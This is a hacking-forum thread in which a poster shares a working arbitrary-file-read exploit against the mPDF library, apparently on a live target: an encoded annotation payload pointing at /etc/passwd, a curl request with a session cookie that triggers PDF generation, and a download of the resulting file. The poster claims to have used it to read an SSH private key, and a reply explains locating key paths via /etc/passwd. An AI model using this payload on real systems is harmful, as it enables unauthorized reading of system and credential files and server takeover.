Мануал/Книга mPDF read any file and meta-git RCE to root

[oxostore]

Holla XSS !

one more mpdf grozdniyandy have a look , you gonna like this.
logged in as admin

Using Burp Suite checking the request seems its based64

decrypt :

using the info from GitHub

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

using CyberChef

curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Y y9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGF zc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1M jB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V 0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyM iUyNTIwLyUyNTNF"

Result Output: OKdAtpf213e12edyJeFWPExZ0H.pdf

curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf

CMD AGAIN

i was able to read id_rsa and get user ssh access !
Credits Please if Copied never shared in other forums!

show some love to keep this going by reaction or whatever support !

any translation to Russian is appreciated from experienced user !
./0x0



​

 

[Whisper]

i was able to read id_rsa and get user ssh access !

But ssh server have only pub key, how you obtain ssh access without private key?

 

[oxostore]

But ssh server have only pub key, how you obtain ssh access without private key?

reading /etc/passwd , will show user path example and if there is a key will be in this path default /home/user/.ssh/rsa_id